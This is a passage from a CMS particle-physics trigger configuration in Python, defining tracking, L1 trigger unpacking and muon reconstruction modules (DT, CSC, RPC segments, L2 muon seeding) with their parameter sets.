cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter4ESPPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter4ESPPixelLayerPairs\" ),\n layerList = cms.vstring( 'TIB1+TIB2' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TID = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TIB = cms.PSet( TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ) ),\n TOB = cms.PSet( )\n)\nhltIter4ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter4ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter4ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter4ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" ),\n minNrOfHitsForRebuild = cms.untracked.int32( 4 )\n)\nhltIter4ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter4ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 6 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 0 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.6 )\n )\n)\nClusterShapeHitFilterESProducer = cms.ESProducer( \"ClusterShapeHitFilterESProducer\",\n ComponentName = cms.string( \"ClusterShapeHitFilter\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPFittingSmootherIT = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPFittingSmootherIT\" ),\n Fitter = cms.string( \"hltESPTrajectoryFitterRK\" ),\n Smoother = cms.string( \"hltESPTrajectorySmootherRK\" ),\n EstimateCut = cms.double( 10.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 3 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( True ),\n NoInvalidHitsBeginEnd = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.6 )\n )\n)\nCastorDbProducer = cms.ESProducer( \"CastorDbProducer\",\n file = cms.untracked.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n dump = cms.untracked.vstring( )\n)\nhltESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"\" ),\n stripClusterProducer = cms.string( \"hltSiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( 'hltSiStripExcludedFEDListProducer' ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\n\nUpdaterService = cms.Service( \"UpdaterService\",\n)\n\nhltTriggerType = cms.EDFilter( \"HLTTriggerTypeFilter\",\n SelectedTriggerType = cms.int32( 1 )\n)\nhltGtDigis = cms.EDProducer( \"L1GlobalTriggerRawToDigi\",\n DaqGtInputTag = cms.InputTag( \"rawDataCollector\" ),\n DaqGtFedId = cms.untracked.int32( 813 ),\n ActiveBoardsMask = cms.uint32( 0xffff ),\n UnpackBxInEvent = cms.int32( 5 ),\n Verbosity = cms.untracked.int32( 0 )\n)\nhltGctDigis = cms.EDProducer( \"GctRawToDigi\",\n inputLabel = cms.InputTag( \"rawDataCollector\" ),\n gctFedId = cms.untracked.int32( 745 ),\n hltMode = cms.bool( True ),\n numberOfGctSamplesToUnpack = cms.uint32( 1 ),\n numberOfRctSamplesToUnpack = cms.uint32( 1 ),\n unpackSharedRegions = cms.bool( False ),\n unpackerVersion = cms.uint32( 0 ),\n checkHeaders = cms.untracked.bool( False ),\n verbose = cms.untracked.bool( False )\n)\nhltL1GtObjectMap = cms.EDProducer( \"L1GlobalTrigger\",\n GmtInputTag = cms.InputTag( \"hltGtDigis\" ),\n GctInputTag = cms.InputTag( \"hltGctDigis\" ),\n CastorInputTag = cms.InputTag( \"castorL1Digis\" ),\n ProduceL1GtDaqRecord = cms.bool( False ),\n ProduceL1GtEvmRecord = cms.bool( False ),\n ProduceL1GtObjectMapRecord = cms.bool( True ),\n WritePsbL1GtDaqRecord = cms.bool( False ),\n ReadTechnicalTriggerRecords = cms.bool( True ),\n EmulateBxInEvent = cms.int32( 1 ),\n AlternativeNrBxBoardDaq = cms.uint32( 0 ),\n AlternativeNrBxBoardEvm = cms.uint32( 0 ),\n BstLengthBytes = cms.int32( -1 ),\n Verbosity = cms.untracked.int32( 0 ),\n TechnicalTriggersInputTags = cms.VInputTag( 'simBscDigis' ),\n RecordLength = cms.vint32( 3, 0 )\n)\nhltL1extraParticles = cms.EDProducer( \"L1ExtraParticlesProd\",\n produceMuonParticles = cms.bool( True ),\n muonSource = cms.InputTag( \"hltGtDigis\" ),\n produceCaloParticles = cms.bool( True ),\n isolatedEmSource = cms.InputTag( 'hltGctDigis','isoEm' ),\n nonIsolatedEmSource = cms.InputTag( 'hltGctDigis','nonIsoEm' ),\n centralJetSource = cms.InputTag( 'hltGctDigis','cenJets' ),\n forwardJetSource = cms.InputTag( 'hltGctDigis','forJets' ),\n tauJetSource = cms.InputTag( 'hltGctDigis','tauJets' ),\n etTotalSource = cms.InputTag( \"hltGctDigis\" ),\n etHadSource = cms.InputTag( \"hltGctDigis\" ),\n etMissSource = cms.InputTag( \"hltGctDigis\" ),\n htMissSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingEtSumsSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingBitCountsSource = cms.InputTag( \"hltGctDigis\" ),\n centralBxOnly = cms.bool( True ),\n ignoreHtMiss = cms.bool( False )\n)\nhltScalersRawToDigi = cms.EDProducer( \"ScalersRawToDigi\",\n scalersInputTag = cms.InputTag( \"rawDataCollector\" )\n)\nhltOnlineBeamSpot = cms.EDProducer( \"BeamSpotOnlineProducer\",\n label = cms.InputTag( \"hltScalersRawToDigi\" ),\n changeToCMSCoordinates = cms.bool( False ),\n maxRadius = cms.double( 2.0 ),\n maxZ = cms.double( 40.0 ),\n setSigmaZ = cms.double( 0.0 ),\n gtEvmLabel = cms.InputTag( \"\" )\n)\nhltOfflineBeamSpot = cms.EDProducer( \"BeamSpotProducer\" )\nhltL1sL1DoubleMu0HighQ = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_DoubleMu0_HighQ\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreDoubleMu4JpsiDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuonL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1DoubleMu0HighQ\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 2 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( True ),\n SelectQualities = cms.vint32( )\n)\nhltMuonDTDigis = cms.EDProducer( \"DTUnpackingModule\",\n dataType = cms.string( \"DDU\" ),\n fedbyType = cms.bool( False ),\n inputLabel = cms.InputTag( \"rawDataCollector\" ),\n useStandardFEDid = cms.bool( True ),\n minFEDid = cms.untracked.int32( 770 ),\n maxFEDid = cms.untracked.int32( 779 ),\n dqmOnly = cms.bool( False ),\n rosParameters = cms.PSet( ),\n readOutParameters = cms.PSet( \n debug = cms.untracked.bool( False ),\n rosParameters = cms.PSet( \n writeSC = cms.untracked.bool( True ),\n readingDDU = cms.untracked.bool( True ),\n performDataIntegrityMonitor = cms.untracked.bool( False ),\n readDDUIDfromDDU = cms.untracked.bool( True ),\n debug = cms.untracked.bool( False ),\n localDAQ = cms.untracked.bool( False )\n ),\n localDAQ = cms.untracked.bool( False ),\n performDataIntegrityMonitor = cms.untracked.bool( False )\n )\n)\nhltDt1DRecHits = cms.EDProducer( \"DTRecHitProducer\",\n debug = cms.untracked.bool( False ),\n dtDigiLabel = cms.InputTag( \"hltMuonDTDigis\" ),\n recAlgo = cms.string( \"DTLinearDriftFromDBAlgo\" ),\n recAlgoConfig = cms.PSet( \n tTrigMode = cms.string( \"DTTTrigSyncFromDB\" ),\n minTime = cms.double( -3.0 ),\n stepTwoFromDigi = cms.bool( False ),\n doVdriftCorr = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n maxTime = cms.double( 420.0 ),\n tTrigModeConfig = cms.PSet( \n vPropWire = cms.double( 24.4 ),\n doTOFCorrection = cms.bool( True ),\n tofCorrType = cms.int32( 0 ),\n wirePropCorrType = cms.int32( 0 ),\n tTrigLabel = cms.string( \"\" ),\n doWirePropCorrection = cms.bool( True ),\n doT0Correction = cms.bool( True ),\n debug = cms.untracked.bool( False )\n )\n )\n)\nhltDt4DSegments = cms.EDProducer( \"DTRecSegment4DProducer\",\n debug = cms.untracked.bool( False ),\n recHits1DLabel = cms.InputTag( \"hltDt1DRecHits\" ),\n recHits2DLabel = cms.InputTag( \"dt2DSegments\" ),\n Reco4DAlgoName = cms.string( \"DTCombinatorialPatternReco4D\" ),\n Reco4DAlgoConfig = cms.PSet( \n segmCleanerMode = cms.int32( 2 ),\n Reco2DAlgoName = cms.string( \"DTCombinatorialPatternReco\" ),\n recAlgoConfig = cms.PSet( \n tTrigMode = cms.string( \"DTTTrigSyncFromDB\" ),\n minTime = cms.double( -3.0 ),\n stepTwoFromDigi = cms.bool( False ),\n doVdriftCorr = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n maxTime = cms.double( 420.0 ),\n tTrigModeConfig = cms.PSet( \n vPropWire = cms.double( 24.4 ),\n doTOFCorrection = cms.bool( True ),\n tofCorrType = cms.int32( 0 ),\n wirePropCorrType = cms.int32( 0 ),\n tTrigLabel = cms.string( \"\" ),\n doWirePropCorrection = cms.bool( True ),\n doT0Correction = cms.bool( True ),\n debug = cms.untracked.bool( False )\n )\n ),\n nSharedHitsMax = cms.int32( 2 ),\n hit_afterT0_resolution = cms.double( 0.03 ),\n Reco2DAlgoConfig = cms.PSet( \n segmCleanerMode = cms.int32( 2 ),\n recAlgoConfig = cms.PSet( \n tTrigMode = cms.string( \"DTTTrigSyncFromDB\" ),\n minTime = cms.double( -3.0 ),\n stepTwoFromDigi = cms.bool( False ),\n doVdriftCorr = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n maxTime = cms.double( 420.0 ),\n tTrigModeConfig = cms.PSet( \n vPropWire = cms.double( 24.4 ),\n doTOFCorrection = cms.bool( True ),\n tofCorrType = cms.int32( 0 ),\n wirePropCorrType = cms.int32( 0 ),\n tTrigLabel = cms.string( \"\" ),\n doWirePropCorrection = cms.bool( True ),\n doT0Correction = cms.bool( True ),\n debug = cms.untracked.bool( False )\n )\n ),\n nSharedHitsMax = cms.int32( 2 ),\n AlphaMaxPhi = cms.double( 1.0 ),\n hit_afterT0_resolution = cms.double( 0.03 ),\n MaxAllowedHits = cms.uint32( 50 ),\n performT0_vdriftSegCorrection = cms.bool( False ),\n AlphaMaxTheta = cms.double( 0.9 ),\n debug = cms.untracked.bool( False ),\n recAlgo = cms.string( \"DTLinearDriftFromDBAlgo\" ),\n nUnSharedHitsMin = cms.int32( 2 ),\n performT0SegCorrection = cms.bool( False )\n ),\n performT0_vdriftSegCorrection = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n recAlgo = cms.string( \"DTLinearDriftFromDBAlgo\" ),\n nUnSharedHitsMin = cms.int32( 2 ),\n AllDTRecHits = cms.bool( True ),\n performT0SegCorrection = cms.bool( False )\n )\n)\nhltMuonCSCDigis = cms.EDProducer( \"CSCDCCUnpacker\",\n InputObjects = cms.InputTag( \"rawDataCollector\" ),\n UseExaminer = cms.bool( True ),\n ExaminerMask = cms.uint32( 0x1febf3f6 ),\n UseSelectiveUnpacking = cms.bool( True ),\n ErrorMask = cms.uint32( 0x0 ),\n UnpackStatusDigis = cms.bool( False ),\n UseFormatStatus = cms.bool( True ),\n PrintEventNumber = cms.untracked.bool( False ),\n Debug = cms.untracked.bool( False ),\n runDQM = cms.untracked.bool( False ),\n VisualFEDInspect = cms.untracked.bool( False ),\n VisualFEDShort = cms.untracked.bool( False ),\n FormatedEventDump = cms.untracked.bool( False ),\n SuppressZeroLCT = cms.untracked.bool( True )\n)\nhltCsc2DRecHits = cms.EDProducer( \"CSCRecHitDProducer\",\n CSCUseCalibrations = cms.bool( True ),\n CSCUseStaticPedestals = cms.bool( False ),\n CSCUseTimingCorrections = cms.bool( True ),\n stripDigiTag = cms.InputTag( 'hltMuonCSCDigis','MuonCSCStripDigi' ),\n wireDigiTag = cms.InputTag( 'hltMuonCSCDigis','MuonCSCWireDigi' ),\n CSCstripWireDeltaTime = cms.int32( 8 ),\n CSCNoOfTimeBinsForDynamicPedestal = cms.int32( 2 ),\n CSCStripPeakThreshold = cms.double( 10.0 ),\n CSCStripClusterChargeCut = cms.double( 25.0 ),\n CSCWireClusterDeltaT = cms.int32( 1 ),\n CSCStripxtalksOffset = cms.double( 0.03 ),\n NoiseLevel_ME1a = cms.double( 7.0 ),\n XTasymmetry_ME1a = cms.double( 0.0 ),\n ConstSyst_ME1a = cms.double( 0.022 ),\n NoiseLevel_ME1b = cms.double( 8.0 ),\n XTasymmetry_ME1b = cms.double( 0.0 ),\n ConstSyst_ME1b = cms.double( 0.0070 ),\n NoiseLevel_ME12 = cms.double( 9.0 ),\n XTasymmetry_ME12 = cms.double( 0.0 ),\n ConstSyst_ME12 = cms.double( 0.0 ),\n NoiseLevel_ME13 = cms.double( 8.0 ),\n XTasymmetry_ME13 = cms.double( 0.0 ),\n ConstSyst_ME13 = cms.double( 0.0 ),\n NoiseLevel_ME21 = cms.double( 9.0 ),\n XTasymmetry_ME21 = cms.double( 0.0 ),\n ConstSyst_ME21 = cms.double( 0.0 ),\n NoiseLevel_ME22 = cms.double( 9.0 ),\n XTasymmetry_ME22 = cms.double( 0.0 ),\n ConstSyst_ME22 = cms.double( 0.0 ),\n NoiseLevel_ME31 = cms.double( 9.0 ),\n XTasymmetry_ME31 = cms.double( 0.0 ),\n ConstSyst_ME31 = cms.double( 0.0 ),\n NoiseLevel_ME32 = cms.double( 9.0 ),\n XTasymmetry_ME32 = cms.double( 0.0 ),\n ConstSyst_ME32 = cms.double( 0.0 ),\n NoiseLevel_ME41 = cms.double( 9.0 ),\n XTasymmetry_ME41 = cms.double( 0.0 ),\n ConstSyst_ME41 = cms.double( 0.0 ),\n readBadChannels = cms.bool( True ),\n readBadChambers = cms.bool( True ),\n UseAverageTime = cms.bool( False ),\n UseParabolaFit = cms.bool( False ),\n UseFivePoleFit = cms.bool( True )\n)\nhltCscSegments = cms.EDProducer( \"CSCSegmentProducer\",\n inputObjects = cms.InputTag( \"hltCsc2DRecHits\" ),\n algo_type = cms.int32( 1 ),\n algo_psets = cms.VPSet( \n cms.PSet( chamber_types = cms.vstring( 'ME1/a',\n 'ME1/b',\n 'ME1/2',\n 'ME1/3',\n 'ME2/1',\n 'ME2/2',\n 'ME3/1',\n 'ME3/2',\n 'ME4/1',\n 'ME4/2' ),\n algo_name = cms.string( \"CSCSegAlgoST\" ),\n parameters_per_chamber_type = cms.vint32( 2, 1, 1, 1, 1, 1, 1, 1, 1, 1 ),\n algo_psets = cms.VPSet( \n cms.PSet( maxRatioResidualPrune = cms.double( 3.0 ),\n yweightPenalty = cms.double( 1.5 ),\n maxRecHitsInCluster = cms.int32( 20 ),\n dPhiFineMax = cms.double( 0.025 ),\n preClusteringUseChaining = cms.bool( True ),\n ForceCovariance = cms.bool( False ),\n hitDropLimit6Hits = cms.double( 0.3333 ),\n NormChi2Cut2D = cms.double( 20.0 ),\n BPMinImprovement = cms.double( 10000.0 ),\n Covariance = cms.double( 0.0 ),\n tanPhiMax = cms.double( 0.5 ),\n SeedBig = cms.double( 0.0015 ),\n onlyBestSegment = cms.bool( False ),\n dRPhiFineMax = cms.double( 8.0 ),\n SeedSmall = cms.double( 2.0E-4 ),\n curvePenalty = cms.double( 2.0 ),\n dXclusBoxMax = cms.double( 4.0 ),\n BrutePruning = cms.bool( True ),\n curvePenaltyThreshold = cms.double( 0.85 ),\n CorrectTheErrors = cms.bool( True ),\n hitDropLimit4Hits = cms.double( 0.6 ),\n useShowering = cms.bool( False ),\n CSCDebug = cms.untracked.bool( False ),\n tanThetaMax = cms.double( 1.2 ),\n NormChi2Cut3D = cms.double( 10.0 ),\n minHitsPerSegment = cms.int32( 3 ),\n ForceCovarianceAll = cms.bool( False ),\n yweightPenaltyThreshold = cms.double( 1.0 ),\n prePrunLimit = cms.double( 3.17 ),\n hitDropLimit5Hits = cms.double( 0.8 ),\n preClustering = cms.bool( True ),\n prePrun = cms.bool( True ),\n maxDPhi = cms.double( 999.0 ),\n maxDTheta = cms.double( 999.0 ),\n Pruning = cms.bool( True ),\n dYclusBoxMax = cms.double( 8.0 )\n ),\n cms.PSet( maxRatioResidualPrune = cms.double( 3.0 ),\n yweightPenalty = cms.double( 1.5 ),\n maxRecHitsInCluster = cms.int32( 24 ),\n dPhiFineMax = cms.double( 0.025 ),\n preClusteringUseChaining = cms.bool( True ),\n ForceCovariance = cms.bool( False ),\n hitDropLimit6Hits = cms.double( 0.3333 ),\n NormChi2Cut2D = cms.double( 20.0 ),\n BPMinImprovement = cms.double( 10000.0 ),\n Covariance = cms.double( 0.0 ),\n tanPhiMax = cms.double( 0.5 ),\n SeedBig = cms.double( 0.0015 ),\n onlyBestSegment = cms.bool( False ),\n dRPhiFineMax = cms.double( 8.0 ),\n SeedSmall = cms.double( 2.0E-4 ),\n curvePenalty = cms.double( 2.0 ),\n dXclusBoxMax = cms.double( 4.0 ),\n BrutePruning = cms.bool( True ),\n curvePenaltyThreshold = cms.double( 0.85 ),\n CorrectTheErrors = cms.bool( True ),\n hitDropLimit4Hits = cms.double( 0.6 ),\n useShowering = cms.bool( False ),\n CSCDebug = cms.untracked.bool( False ),\n tanThetaMax = cms.double( 1.2 ),\n NormChi2Cut3D = cms.double( 10.0 ),\n minHitsPerSegment = cms.int32( 3 ),\n ForceCovarianceAll = cms.bool( False ),\n yweightPenaltyThreshold = cms.double( 1.0 ),\n prePrunLimit = cms.double( 3.17 ),\n hitDropLimit5Hits = cms.double( 0.8 ),\n preClustering = cms.bool( True ),\n prePrun = cms.bool( True ),\n maxDPhi = cms.double( 999.0 ),\n maxDTheta = cms.double( 999.0 ),\n Pruning = cms.bool( True ),\n dYclusBoxMax = cms.double( 8.0 )\n )\n )\n )\n )\n)\nhltMuonRPCDigis = cms.EDProducer( \"RPCUnpackingModule\",\n InputLabel = cms.InputTag( \"rawDataCollector\" ),\n doSynchro = cms.bool( False )\n)\nhltRpcRecHits = cms.EDProducer( \"RPCRecHitProducer\",\n rpcDigiLabel = cms.InputTag( \"hltMuonRPCDigis\" ),\n recAlgo = cms.string( \"RPCRecHitStandardAlgo\" ),\n maskSource = cms.string( \"File\" ),\n maskvecfile = cms.FileInPath( \"RecoLocalMuon/RPCRecHit/data/RPCMaskVec.dat\" ),\n deadSource = cms.string( \"File\" ),\n deadvecfile = cms.FileInPath( \"RecoLocalMuon/RPCRecHit/data/RPCDeadVec.dat\" ),\n recAlgoConfig = cms.PSet( )\n)\nhltL2MuonSeeds = cms.EDProducer( \"L2MuonSeedGenerator\",\n InputObjects = cms.InputTag( \"hltL1extraParticles\" ),\n GMTReadoutCollection = cms.InputTag( \"hltGtDigis\" ),\n Propagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n L1MinPt = cms.double( 0.0 ),\n L1MaxEta = cms.double( 2.5 ),\n L1MinQuality = cms.uint32( 1 ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'SteppingHelixPropagatorAny' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n )\n)\nhltL2Muons = cms.EDProducer( \"L2MuonProducer\",\n InputObjects = cms.InputTag( \"hltL2MuonSeeds\" ),\n L2TrajBuilderParameters = cms.PSet( \n DoRefit = cms.bool( False ),\n SeedPropagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n FilterParameters = cms.PSet( \n NumberOfSigma = cms.double( 3.0 ),\n FitDirection = cms.string( \"insideOut\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n MaxChi2 = cms.double( 1000.0 ),\n MuonTrajectoryUpdatorParameters = cms.PSet( \n MaxChi2 = cms.double( 25.0 ),\n RescaleErrorFactor = cms.double( 100.0 ),\n Granularity = cms.int32( 0 ),\n ExcludeRPCFromFit = cms.bool( False ),\n UseInvalidHits = cms.bool( True ),\n RescaleError = cms.bool( False )\n ),\n EnableRPCMeasurement = cms.bool( True ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n EnableDTMeasurement = cms.bool( True ),\n RPCRecSegmentLabel = cms.InputTag( \"hltRpcRecHits\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n EnableCSCMeasurement = cms.bool( True )\n ),\n NavigationType = cms.string( \"Standard\" ),\n SeedTransformerParameters = cms.PSet( \n Fitter = cms.string( \"hltESPKFFittingSmootherForL2Muon\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n NMinRecHits = cms.uint32( 2 ),\n UseSubRecHits = cms.bool( False ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n RescaleError = cms.double( 100.0 )\n ),\n DoBackwardFilter = cms.bool( True ),\n SeedPosition = cms.string( \"in\" ),\n BWFilterParameters = cms.PSet( \n NumberOfSigma = cms.double( 3.0 ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n FitDirection = cms.string( \"outsideIn\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n MaxChi2 = cms.double( 100.0 ),\n MuonTrajectoryUpdatorParameters = cms.PSet( \n MaxChi2 = cms.double( 25.0 ),\n RescaleErrorFactor = cms.double( 100.0 ),\n Granularity = cms.int32( 2 ),\n ExcludeRPCFromFit = cms.bool( False ),\n UseInvalidHits = cms.bool( True ),\n RescaleError = cms.bool( False )\n ),\n EnableRPCMeasurement = cms.bool( True ),\n BWSeedType = cms.string( \"fromGenerator\" ),\n EnableDTMeasurement = cms.bool( True ),\n RPCRecSegmentLabel = cms.InputTag( \"hltRpcRecHits\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n EnableCSCMeasurement = cms.bool( True )\n ),\n DoSeedRefit = cms.bool( False )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPFastSteppingHelixPropagatorAny',\n 'hltESPFastSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n DoSmoothing = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n BeamSpotPosition = cms.vdouble( 0.0, 0.0, 0.0 ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( True )\n )\n)\nhltL2MuonCandidates = cms.EDProducer( \"L2MuonCandidateProducer\",\n InputObjects = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' 